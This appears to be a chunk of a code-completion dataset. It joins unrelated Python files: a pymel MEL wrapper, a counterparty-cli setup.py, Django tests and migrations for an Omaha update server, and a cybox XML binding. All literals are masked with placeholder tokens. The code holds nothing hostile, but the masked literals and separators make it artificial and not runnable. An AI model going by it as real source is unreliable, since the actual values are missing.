                res.getResult(result)
                return [datatypes.Vector(result[i]) for i in range(result.length())]
            elif resType == _api.MCommandResult.kMatrix:
                result = _api.MMatrix()
                res.getResult(result)
                return datatypes.Matrix(result)
            elif resType == _api.MCommandResult.kMatrixArray:
                result = _api.MMatrixArray()
                res.getResult(result)
                return [datatypes.Matrix(result[i]) for i in range(result.length())]

    @staticmethod
    def error(msg, showLineNumber=False):
        # Emit a MEL-level error; flag choice toggles line-number display.
        if showLineNumber:
            flags = '<STR_LIT>'
        else:
            flags = '<STR_LIT>'
        _mm.eval("""<STR_LIT>""" % (flags, pythonToMel(msg)))

    @staticmethod
    def warning(msg, showLineNumber=False):
        # Same pattern as error(), at warning severity.
        if showLineNumber:
            flags = '<STR_LIT>'
        else:
            flags = '<STR_LIT>'
        _mm.eval("""<STR_LIT>""" % (flags, pythonToMel(msg)))

    @staticmethod
    def trace(msg, showLineNumber=False):
        # Same pattern as error(), at trace severity.
        if showLineNumber:
            flags = '<STR_LIT>'
        else:
            flags = '<STR_LIT>'
        _mm.eval("""<STR_LIT>""" % (flags, pythonToMel(msg)))

    @staticmethod
    def tokenize(*args):
        # MEL tokenize has no sensible python binding here.
        raise NotImplementedError, "<STR_LIT>"

# Module-level singleton dispatcher for MEL procedures.
mel = Mel()

def conditionExists(conditionName):
    """<STR_LIT>"""
    # True when Maya's scriptJob knows the named condition.
    return conditionName in cmds.scriptJob(listConditions=True)

_factories.createFunctions(__name__)
<s> """<STR_LIT>""" <EOL> import imp <EOL> import os <EOL> import sys <EOL> import common . core <EOL> menuModulePath = '<STR_LIT>' % common . core . globalVariables . toolsLocation <EOL> if os . path . exists ( menuModulePath ) : <EOL> sys . path . append ( os . path . split ( menuModulePath ) [ <NUM_LIT:0> ] ) <EOL> else : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> fp , pathname , description = imp . find_module ( os . path . basename ( menuModulePath ) . strip ( '<STR_LIT>' ) ) <EOL> startModule = imp . load_module ( os . path . basename ( menuModulePath ) . strip ( '<STR_LIT>' ) , fp , pathname , description ) <EOL> startModule . MayaMenu ( ) . startUp ( ) <EOL> print "<STR_LIT>" </s>
<s> '''<STR_LIT>''' </s>
<s> from setuptools . command . install import install as _install <EOL> from setuptools import setup , find_packages , Command <EOL> import os , sys <EOL> import shutil <EOL> import ctypes . util <EOL> import configparser , platform <EOL> from counterpartycli import APP_VERSION <EOL> class generate_configuration_files ( Command ) : <EOL> description = "<STR_LIT>" <EOL> user_options = [ ] <EOL> def initialize_options ( self ) : <EOL> pass <EOL> def finalize_options ( self ) : <EOL> pass <EOL> def run ( self ) : <EOL> from counterpartycli . setup import generate_config_files <EOL> generate_config_files ( ) <EOL> class install ( _install ) : <EOL> description = "<STR_LIT>" <EOL> def run ( self ) : <EOL> caller = sys . _getframe ( <NUM_LIT:2> ) <EOL> caller_module = caller . f_globals . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> caller_name = caller . f_code . co_name <EOL> if caller_module == '<STR_LIT>' or caller_name == '<STR_LIT>' : <EOL> _install . run ( self ) <EOL> else : <EOL> self . do_egg_install ( ) <EOL> self . 
run_command ( '<STR_LIT>' ) <EOL> required_packages = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> setup_options = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:version>' : APP_VERSION , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] , <EOL> '<STR_LIT>' : '<STR_LIT>' + APP_VERSION , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : find_packages ( ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : required_packages , <EOL> '<STR_LIT>' : required_packages , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : install , <EOL> '<STR_LIT>' : generate_configuration_files <EOL> } <EOL> } <EOL> if sys . argv [ <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> import py2exe <EOL> from py2exe . distutils_buildexe import py2exe as _py2exe <EOL> WIN_DIST_DIR = '<STR_LIT>' . format ( APP_VERSION ) <EOL> class py2exe ( _py2exe ) : <EOL> def run ( self ) : <EOL> from counterpartycli . setup import before_py2exe_build , after_py2exe_build <EOL> before_py2exe_build ( WIN_DIST_DIR ) <EOL> _py2exe . run ( self ) <EOL> after_py2exe_build ( WIN_DIST_DIR ) <EOL> setup_options . 
update ( { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : WIN_DIST_DIR <EOL> } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : py2exe <EOL> } <EOL> } ) <EOL> elif sys . argv [ <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> setup_options [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> setup_options [ '<STR_LIT>' ] . append ( '<STR_LIT>' ) <EOL> setup ( ** setup_options ) </s>
<s> """<STR_LIT>""" <EOL> from django . core . files . uploadedfile import SimpleUploadedFile <EOL> from django . db . models import signals <EOL> import factory <EOL> class SymbolsFactory ( factory . DjangoModelFactory ) : <EOL> class Meta : <EOL> model = '<STR_LIT>' <EOL> file = SimpleUploadedFile ( '<STR_LIT>' , b'<STR_LIT:U+0020>' * <NUM_LIT> ) <EOL> debug_id = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> debug_file = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> class CrashFactory ( factory . DjangoModelFactory ) : <EOL> class Meta : <EOL> model = '<STR_LIT>' <EOL> appid = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> userid = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> meta = { '<STR_LIT>' : '<STR_LIT>' } <EOL> signature = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> @ factory . django . mute_signals ( signals . post_save ) <EOL> class CrashFactoryWithFiles ( CrashFactory ) : <EOL> archive = factory . django . FileField ( filename = '<STR_LIT>' ) <EOL> upload_file_minidump = factory . django . FileField ( filename = '<STR_LIT>' ) <EOL> class CrashDescriptionFactory ( factory . DjangoModelFactory ) : <EOL> class Meta : <EOL> model = '<STR_LIT>' <EOL> crash = factory . lazy_attribute ( lambda x : CrashFactory ( ) ) <EOL> summary = '<STR_LIT>' <EOL> description = '<STR_LIT>' </s>
<s> from __future__ import unicode_literals <EOL> from django . db import migrations , models <EOL> import django_extensions . db . fields <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = django_extensions . db . fields . CreationDateTimeField ( auto_now_add = True , verbose_name = '<STR_LIT>' ) , <EOL> ) , <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = django_extensions . db . fields . ModificationDateTimeField ( auto_now = True , verbose_name = '<STR_LIT>' ) , <EOL> ) , <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = django_extensions . db . fields . CreationDateTimeField ( auto_now_add = True , verbose_name = '<STR_LIT>' ) , <EOL> ) , <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = django_extensions . db . fields . ModificationDateTimeField ( auto_now = True , verbose_name = '<STR_LIT>' ) , <EOL> ) , <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = django_extensions . db . fields . CreationDateTimeField ( auto_now_add = True , verbose_name = '<STR_LIT>' ) , <EOL> ) , <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = django_extensions . db . fields . ModificationDateTimeField ( auto_now = True , verbose_name = '<STR_LIT>' ) , <EOL> ) , <EOL> ] </s>
<s> """<STR_LIT>""" <EOL> from django . db . models . query import QuerySet <EOL> from django . db import models <EOL> from django . db . models import F , Sum <EOL> class FeedbackQuerySet ( QuerySet ) : <EOL> def filter_by_enabled ( self , * args , ** kwargs ) : <EOL> return self . filter ( is_enabled = True , * args , ** kwargs ) <EOL> def get_size ( self ) : <EOL> return self . aggregate ( size = Sum ( F ( '<STR_LIT>' ) + F ( '<STR_LIT>' ) + F ( '<STR_LIT>' ) + F ( '<STR_LIT>' ) ) ) [ '<STR_LIT:size>' ] or <NUM_LIT:0> <EOL> class FeedbackManager ( models . Manager ) : <EOL> def get_queryset ( self ) : <EOL> return FeedbackQuerySet ( self . model , using = self . _db ) <EOL> def __getattr__ ( self , name ) : <EOL> if name . startswith ( '<STR_LIT:_>' ) : <EOL> raise AttributeError <EOL> else : <EOL> return getattr ( self . get_queryset ( ) , name ) </s>
<s> """<STR_LIT>""" <EOL> from django . conf . urls import url <EOL> from views import status <EOL> urlpatterns = [ <EOL> url ( r'<STR_LIT>' , status , name = '<STR_LIT:status>' ) , <EOL> ] </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , serialize = False , auto_created = True , primary_key = True ) ) , <EOL> ( '<STR_LIT:name>' , models . PositiveSmallIntegerField ( choices = [ ( <NUM_LIT:1> , b'<STR_LIT>' ) , ( <NUM_LIT:0> , b'<STR_LIT>' ) ] ) ) , <EOL> ( '<STR_LIT:index>' , models . CharField ( max_length = <NUM_LIT:255> ) ) , <EOL> ( '<STR_LIT:value>' , models . TextField ( ) ) , <EOL> ( '<STR_LIT:version>' , models . ForeignKey ( to = '<STR_LIT>' ) ) , <EOL> ] , <EOL> options = { <EOL> } , <EOL> bases = ( models . Model , ) , <EOL> ) , <EOL> ] </s>
"""<STR_LIT>"""
# Tests for omaha.builder.get_version: channel selection, partial (percentage)
# updates, and active-user gating tracked via bitmapist events in redis.
from datetime import datetime
from uuid import UUID

from bitmapist import mark_event
from django.test import TestCase
from django.core.files.uploadedfile import SimpleUploadedFile

from omaha.tests.utils import temporary_media_root
from omaha.factories import VersionFactory
from omaha.builder import get_version
from omaha.models import PartialUpdate, Version, Channel, ACTIVE_USERS_DICT_CHOICES
from omaha.utils import redis, get_id


@temporary_media_root()
class BuilderTest(TestCase):

    def setUp(self):
        # Start from a clean redis database — bitmapist state lives there.
        redis.flushdb()

    def tearDown(self):
        redis.flushdb()

    def test_get_version(self):
        # The single published version is returned regardless of the (masked)
        # client-version argument.
        userid = '<STR_LIT>'
        version = VersionFactory.create(file=SimpleUploadedFile('<STR_LIT>', b'<STR_LIT>'))
        self.assertEqual(version, get_version(version.app.pk,
                                              version.platform.name,
                                              version.channel.name,
                                              '<STR_LIT>',
                                              userid))
        self.assertEqual(version, get_version(version.app.pk,
                                              version.platform.name,
                                              version.channel.name,
                                              '<STR_LIT>',
                                              userid))

    def test_get_version_partial_update(self):
        # A beta version behind a PartialUpdate is served only to user ids
        # falling inside the rollout percentage bucket.
        userid = "<STR_LIT>" % UUID(int=<NUM_LIT:1>)
        userid_beta = "<STR_LIT>" % UUID(int=<NUM_LIT>)
        version = VersionFactory.create(file=SimpleUploadedFile('<STR_LIT>', b'<STR_LIT>'))
        version_beta = Version.objects.create(
            file=SimpleUploadedFile('<STR_LIT>', b'<STR_LIT>'),
            app=version.app,
            platform=version.platform,
            channel=version.channel,
            version='<STR_LIT>',
        )
        PartialUpdate.objects.create(version=version_beta,
                                     percent=<NUM_LIT:5>,
                                     start_date=datetime.now(),
                                     end_date=datetime.now(),
                                     active_users=ACTIVE_USERS_DICT_CHOICES['<STR_LIT:all>'])
        self.assertEqual(version, get_version(version.app.pk,
                                              version.platform.name,
                                              version.channel.name,
                                              '<STR_LIT>',
                                              userid))
        self.assertEqual(version_beta, get_version(version.app.pk,
                                                   version.platform.name,
                                                   version.channel.name,
                                                   '<STR_LIT>',
                                                   userid_beta))

    def test_get_app_version_channel(self):
        # Requesting the beta channel must return the version published there,
        # not the one on the default channel.
        userid = '<STR_LIT>'
        channel_beta = Channel.objects.create(name="<STR_LIT>")
        version = VersionFactory.create(file=SimpleUploadedFile('<STR_LIT>', b'<STR_LIT>'))
        version_beta = Version.objects.create(
            file=SimpleUploadedFile('<STR_LIT>', b'<STR_LIT>'),
            app=version.app,
            platform=version.platform,
            channel=channel_beta,
            version='<STR_LIT>',
        )
        self.assertEqual(version_beta, get_version(version.app.pk,
                                                   version.platform.name,
                                                   channel_beta.name,
                                                   '<STR_LIT>',
                                                   userid))

    def test_get_app_version_exlude_new_users(self):
        # NOTE(review): test name typo ("exlude") kept — renaming would change
        # the discovered test id.  Checks that a partial update covering all
        # active users still excludes users depending on the (masked)
        # client-version argument of the third call.
        userid = "<STR_LIT>" % UUID(int=<NUM_LIT:1>)
        userid_beta = "<STR_LIT>" % UUID(int=<NUM_LIT>)
        version = VersionFactory.create(file=SimpleUploadedFile('<STR_LIT>', b'<STR_LIT>'))
        version_beta = Version.objects.create(
            file=SimpleUploadedFile('<STR_LIT>', b'<STR_LIT>'),
            app=version.app,
            platform=version.platform,
            channel=version.channel,
            version='<STR_LIT>',
        )
        PartialUpdate.objects.create(version=version_beta,
                                     percent=<NUM_LIT:5>,
                                     start_date=datetime.now(),
                                     end_date=datetime.now(),
                                     active_users=ACTIVE_USERS_DICT_CHOICES['<STR_LIT:all>'])
        self.assertEqual(version, get_version(version.app.pk,
                                              version.platform.name,
                                              version.channel.name,
                                              '<STR_LIT>',
                                              userid))
        self.assertEqual(version_beta, get_version(version.app.pk,
                                                   version.platform.name,
                                                   version.channel.name,
                                                   '<STR_LIT>',
                                                   userid_beta))
        self.assertEqual(version, get_version(version.app.pk,
                                              version.platform.name,
                                              version.channel.name,
                                              '<STR_LIT>',
                                              userid_beta))

    def test_get_app_version_active_users(self):
        # With the default active-users gating (no explicit active_users arg),
        # only users marked active via a bitmapist event get the beta version;
        # an in-bucket but inactive user falls back to the stable version.
        userid = "<STR_LIT>" % UUID(int=<NUM_LIT:1>)
        userid_beta = "<STR_LIT>" % UUID(int=<NUM_LIT>)
        userid_beta_not_active = "<STR_LIT>" % UUID(int=<NUM_LIT>)
        version = VersionFactory.create(file=SimpleUploadedFile('<STR_LIT>', b'<STR_LIT>'))
        version_beta = Version.objects.create(
            file=SimpleUploadedFile('<STR_LIT>', b'<STR_LIT>'),
            app=version.app,
            platform=version.platform,
            channel=version.channel,
            version='<STR_LIT>',
        )
        # Mark only userid_beta as active.
        id = get_id(userid_beta)
        mark_event('<STR_LIT>', id)
        PartialUpdate.objects.create(version=version_beta,
                                     percent=<NUM_LIT:5>,
                                     start_date=datetime.now(),
                                     end_date=datetime.now())
        self.assertEqual(version, get_version(version.app.pk,
                                              version.platform.name,
                                              version.channel.name,
                                              '<STR_LIT>',
                                              userid))
        self.assertEqual(version_beta, get_version(version.app.pk,
                                                   version.platform.name,
                                                   version.channel.name,
                                                   '<STR_LIT>',
                                                   userid_beta))
        self.assertEqual(version, get_version(version.app.pk,
                                              version.platform.name,
                                              version.channel.name,
                                              '<STR_LIT>',
                                              userid_beta_not_active))
<s> from django_nose . runner import NoseTestSuiteRunner <EOL> from django . db import connections <EOL> from copy import copy <EOL> class PublicPrivateNoseTestSuiteRunner ( NoseTestSuiteRunner ) : <EOL> def setup_databases ( self ) : <EOL> res = super ( PublicPrivateNoseTestSuiteRunner , self ) . setup_databases ( ) <EOL> connections . databases [ '<STR_LIT:root>' ] = copy ( connections . databases [ '<STR_LIT:default>' ] ) <EOL> connections . close_all ( ) <EOL> return res </s>
<s> """<STR_LIT>""" <EOL> from rest_framework import serializers <EOL> from omaha . models import Application , Channel <EOL> from sparkle . models import SparkleVersion <EOL> __all__ = [ '<STR_LIT>' ] <EOL> class SparkleVersionSerializer ( serializers . HyperlinkedModelSerializer ) : <EOL> is_enabled = serializers . BooleanField ( default = True , required = False ) <EOL> app = serializers . PrimaryKeyRelatedField ( queryset = Application . objects . all ( ) ) <EOL> channel = serializers . PrimaryKeyRelatedField ( queryset = Channel . objects . all ( ) ) <EOL> version = serializers . CharField ( ) <EOL> class Meta : <EOL> model = SparkleVersion <EOL> fields = ( '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:version>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT:file>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> read_only_fields = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def create ( self , validated_data ) : <EOL> if not validated_data . get ( '<STR_LIT>' ) : <EOL> file = validated_data [ '<STR_LIT:file>' ] <EOL> validated_data [ '<STR_LIT>' ] = file . size <EOL> return super ( SparkleVersionSerializer , self ) . create ( validated_data ) </s>
<s> </s>
<s> """<STR_LIT>""" <EOL> import re <EOL> from greplin . scales import aggregation <EOL> import unittest <EOL> class AggregationTest ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def testNoData ( self ) : <EOL> "<STR_LIT>" <EOL> agg = aggregation . Aggregation ( { <EOL> '<STR_LIT:a>' : { <EOL> '<STR_LIT:*>' : [ aggregation . Sum ( ) ] <EOL> } <EOL> } ) <EOL> agg . addSource ( '<STR_LIT>' , { '<STR_LIT:a>' : { } } ) <EOL> agg . result ( ) <EOL> def testRegex ( self ) : <EOL> "<STR_LIT>" <EOL> agg = aggregation . Aggregation ( { <EOL> '<STR_LIT:a>' : { <EOL> ( '<STR_LIT:success>' , re . compile ( "<STR_LIT>" ) ) : [ aggregation . Sum ( dataFormat = aggregation . DataFormats . DIRECT ) ] , <EOL> ( '<STR_LIT:error>' , re . compile ( "<STR_LIT>" ) ) : [ aggregation . Sum ( dataFormat = aggregation . DataFormats . DIRECT ) ] <EOL> } } ) <EOL> agg . addSource ( '<STR_LIT>' , { '<STR_LIT:a>' : { '<STR_LIT>' : <NUM_LIT:10> , '<STR_LIT>' : <NUM_LIT:10> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:3> } } ) <EOL> result = agg . result ( ) <EOL> self . assertEquals ( result [ '<STR_LIT:a>' ] [ '<STR_LIT:success>' ] [ '<STR_LIT>' ] , <NUM_LIT:20> ) <EOL> self . assertEquals ( result [ '<STR_LIT:a>' ] [ '<STR_LIT:error>' ] [ '<STR_LIT>' ] , <NUM_LIT:4> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
# Generated XML binding (generateDS-style) for the cybox AS object type.
# NOTE(review): generated code — exact statement order and the get/set/validate
# method shapes are part of the binding convention; do not hand-restructure.
import sys
from mixbox.binding_utils import *
from . import cybox_common


class ASObjectType(cybox_common.ObjectPropertiesType):
    """<STR_LIT>"""
    subclass = None
    superclass = cybox_common.ObjectPropertiesType

    def __init__(self, object_reference=None, Custom_Properties=None, xsi_type=None, Number=None, Name=None, Handle=None, Regional_Internet_Registry=None):
        super(ASObjectType, self).__init__(object_reference, Custom_Properties, xsi_type)
        self.Number = Number
        self.Name = Name
        self.Handle = Handle
        self.Regional_Internet_Registry = Regional_Internet_Registry

    def factory(*args_, **kwargs_):
        # Builds the registered subclass when one is installed, else this type.
        if ASObjectType.subclass:
            return ASObjectType.subclass(*args_, **kwargs_)
        else:
            return ASObjectType(*args_, **kwargs_)
    factory = staticmethod(factory)

    # Generated accessor/validator boilerplate (validators are intentionally no-ops).
    def get_Number(self): return self.Number
    def set_Number(self, Number): self.Number = Number
    def validate_NonNegativeIntegerObjectPropertyType(self, value):
        pass
    def get_Name(self): return self.Name
    def set_Name(self, Name): self.Name = Name
    def validate_StringObjectPropertyType(self, value):
        pass
    def get_Handle(self): return self.Handle
    def set_Handle(self, Handle): self.Handle = Handle
    def get_Regional_Internet_Registry(self): return self.Regional_Internet_Registry
    def set_Regional_Internet_Registry(self, Regional_Internet_Registry): self.Regional_Internet_Registry = Regional_Internet_Registry
    def validate_RegionalRegistryType(self, value):
        pass

    def hasContent_(self):
        # True when any own child element or any inherited content is set;
        # drives whether export() emits a paired or self-closing tag.
        if (
            self.Number is not None or
            self.Name is not None or
            self.Handle is not None or
            self.Regional_Internet_Registry is not None or
            super(ASObjectType, self).hasContent_()
        ):
            return True
        else:
            return False

    def export(self, lwrite, level, namespace_='<STR_LIT>', name_='<STR_LIT>', namespacedef_='<STR_LIT>', pretty_print=True):
        # Serialize this element: open tag + attributes, children if any, close tag.
        if pretty_print:
            eol_ = '<STR_LIT:\n>'
        else:
            eol_ = '<STR_LIT>'
        showIndent(lwrite, level, pretty_print)
        lwrite('<STR_LIT>' % (namespace_, name_, namespacedef_ and '<STR_LIT:U+0020>' + namespacedef_ or '<STR_LIT>', ))
        already_processed = set()
        self.exportAttributes(lwrite, level, already_processed, namespace_, name_='<STR_LIT>')
        if self.hasContent_():
            lwrite('<STR_LIT>' % (eol_, ))
            self.exportChildren(lwrite, level + <NUM_LIT:1>, namespace_, name_, pretty_print=pretty_print)
            showIndent(lwrite, level, pretty_print)
            lwrite('<STR_LIT>' % (namespace_, name_, eol_))
        else:
            lwrite('<STR_LIT>' % (eol_, ))

    def exportAttributes(self, lwrite, level, already_processed, namespace_='<STR_LIT>', name_='<STR_LIT>'):
        # No own attributes; delegate to the base type.
        super(ASObjectType, self).exportAttributes(lwrite, level, already_processed, namespace_, name_='<STR_LIT>')

    def exportChildren(self, lwrite, level, namespace_='<STR_LIT>', name_='<STR_LIT>', fromsubclass_=False, pretty_print=True):
        # Base children first, then own child elements in schema order.
        super(ASObjectType, self).exportChildren(lwrite, level, '<STR_LIT>', name_, True, pretty_print=pretty_print)
        if pretty_print:
            eol_ = '<STR_LIT:\n>'
        else:
            eol_ = '<STR_LIT>'
        if self.Number is not None:
            self.Number.export(lwrite, level, '<STR_LIT>', name_='<STR_LIT>', pretty_print=pretty_print)
        if self.Name is not None:
            self.Name.export(lwrite, level, '<STR_LIT>', name_='<STR_LIT:Name>', pretty_print=pretty_print)
        if self.Handle is not None:
            self.Handle.export(lwrite, level, '<STR_LIT>', name_='<STR_LIT>', pretty_print=pretty_print)
        if self.Regional_Internet_Registry is not None:
            self.Regional_Internet_Registry.export(lwrite, level, '<STR_LIT>', name_='<STR_LIT>', pretty_print=pretty_print)

    def build(self, node):
        # Populate this object from an etree node: attributes, then children.
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-<NUM_LIT:1>]
            self.buildChildren(child, node, nodeName_)

    def buildAttributes(self, node, attrs, already_processed):
        super(ASObjectType, self).buildAttributes(node, attrs, already_processed)

    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Dispatch on child tag name to the matching binding type, then let the
        # base class consume anything it recognizes.
        if nodeName_ == '<STR_LIT>':
            obj_ = cybox_common.NonNegativeIntegerObjectPropertyType.factory()
            obj_.build(child_)
            self.set_Number(obj_)
        elif nodeName_ == '<STR_LIT:Name>':
            obj_ = cybox_common.StringObjectPropertyType.factory()
            obj_.build(child_)
            self.set_Name(obj_)
        elif nodeName_ == '<STR_LIT>':
            obj_ = cybox_common.StringObjectPropertyType.factory()
            obj_.build(child_)
            self.set_Handle(obj_)
        elif nodeName_ == '<STR_LIT>':
            obj_ = cybox_common.RegionalRegistryType.factory()
            obj_.build(child_)
            self.set_Regional_Internet_Registry(obj_)
        super(ASObjectType, self).buildChildren(child_, node, nodeName_, True)


# Tag-name → binding-class lookup used by the generated parser.
# NOTE(review): this mapping is truncated here — it continues past the end of
# this chunk; the final entry below is reproduced verbatim as cut.
GDSClassesMapping = {
    '<STR_LIT>': cybox_common.BuildUtilityType,
    '<STR_LIT>': cybox_common.EndiannessType,
    '<STR_LIT>': cybox_common.ErrorsType,
    '<STR_LIT>': cybox_common.TimeType,
    '<STR_LIT>': cybox_common.StringObjectPropertyType,
    '<STR_LIT>': cybox_common.MetadataType,
    '<STR_LIT>': cybox_common.HashType,
    '<STR_LIT>': cybox_common.ControlledVocabularyStringType,
    '<STR_LIT>': cybox_common.InternalStringsType,
    '<STR_LIT>': cybox_common.FuzzyHashStructureType,
    '<STR_LIT>': cybox_common.MetadataType,
    '<STR_LIT>': cybox_common.HashValueType,
    '<STR_LIT>': cybox_common.DigitalSignatureInfoType,
    '<STR_LIT>': cybox_common.CodeSnippetsType,
    '<STR_LIT>': cybox_common.StringObjectPropertyType,
    '<STR_LIT>': cybox_common.IntegerObjectPropertyType,
    '<STR_LIT>': cybox_common.DateTimeWithPrecisionType,
    '<STR_LIT>': cybox_common.ToolReferenceType,
    '<STR_LIT>': cybox_common.ControlledVocabularyStringType,
    '<STR_LIT>': cybox_common.InternationalizationSettingsType,
    '<STR_LIT>': cybox_common.ToolConfigurationType,
    '<STR_LIT>': cybox_common.CompilerType,
    '<STR_LIT>': cybox_common.DateWithPrecisionType,
    '<STR_LIT>': cybox_common.FunctionsType,
    '<STR_LIT>': cybox_common.StringObjectPropertyType,
    '<STR_LIT>': cybox_common.PlatformSpecificationType,
    '<STR_LIT>': cybox_common.CompilerInformalDescriptionType,
    '<STR_LIT>': cybox_common.DateTimeWithPrecisionType,
    '<STR_LIT>': cybox_common.ObjectPropertiesType,
    '<STR_LIT>': cybox_common.PlatformSpecificationType,
    '<STR_LIT>': cybox_common.UsageContextAssumptionsType,
    '<STR_LIT>': cybox_common.ControlledVocabularyStringType,
    '<STR_LIT>': cybox_common.CompilersType,
    '<STR_LIT>': cybox_common.ControlledVocabularyStringType,
    '<STR_LIT>': cybox_common.ExtractedStringType,
    '<STR_LIT>': cybox_common.CustomPropertiesType,
    '<STR_LIT>': cybox_common.BuildInformationType,
    '<STR_LIT>': cybox_common.HashListType,
    '<STR_LIT>': cybox_common.
LocationType , <EOL> '<STR_LIT>' : cybox_common . ErrorInstancesType , <EOL> '<STR_LIT>' : cybox_common . DateWithPrecisionType , <EOL> '<STR_LIT>' : cybox_common . StringObjectPropertyType , <EOL> '<STR_LIT>' : cybox_common . StringObjectPropertyType , <EOL> '<STR_LIT>' : cybox_common . CompensationModelType , <EOL> '<STR_LIT>' : cybox_common . PropertyType , <EOL> '<STR_LIT>' : cybox_common . ExtractedStringsType , <EOL> '<STR_LIT>' : cybox_common . PersonnelType , <EOL> '<STR_LIT>' : cybox_common . ObjectPropertiesType , <EOL> '<STR_LIT>' : cybox_common . ConfigurationSettingsType , <EOL> '<STR_LIT>' : cybox_common . SimpleHashValueType , <EOL> '<STR_LIT>' : cybox_common . HexBinaryObjectPropertyType , <EOL> '<STR_LIT>' : cybox_common . DateTimeWithPrecisionType , <EOL> '<STR_LIT>' : cybox_common . ObjectPropertiesType , <EOL> '<STR_LIT>' : cybox_common . StringObjectPropertyType , <EOL> '<STR_LIT>' : cybox_common . RegionalRegistryType , <EOL> '<STR_LIT>' : cybox_common . PlatformIdentifierType , <EOL> '<STR_LIT>' : cybox_common . ToolSpecificDataType , <EOL> '<STR_LIT>' : cybox_common . ExecutionEnvironmentType , <EOL> '<STR_LIT>' : cybox_common . IntegerObjectPropertyType , <EOL> '<STR_LIT>' : cybox_common . DependenciesType , <EOL> '<STR_LIT>' : cybox_common . IntegerObjectPropertyType , <EOL> '<STR_LIT>' : cybox_common . IntegerObjectPropertyType , <EOL> '<STR_LIT>' : cybox_common . DateRangeType , <EOL> '<STR_LIT>' : cybox_common . HashListType , <EOL> '<STR_LIT>' : cybox_common . HashSegmentsType , <EOL> '<STR_LIT>' : cybox_common . StringObjectPropertyType , <EOL> '<STR_LIT>' : cybox_common . StructuredTextType , <EOL> '<STR_LIT>' : cybox_common . FuzzyHashBlockType , <EOL> '<STR_LIT>' : cybox_common . DependencyType , <EOL> '<STR_LIT>' : cybox_common . ErrorType , <EOL> '<STR_LIT>' : cybox_common . HexBinaryObjectPropertyType , <EOL> '<STR_LIT>' : cybox_common . EnvironmentVariableType , <EOL> '<STR_LIT>' : cybox_common . 
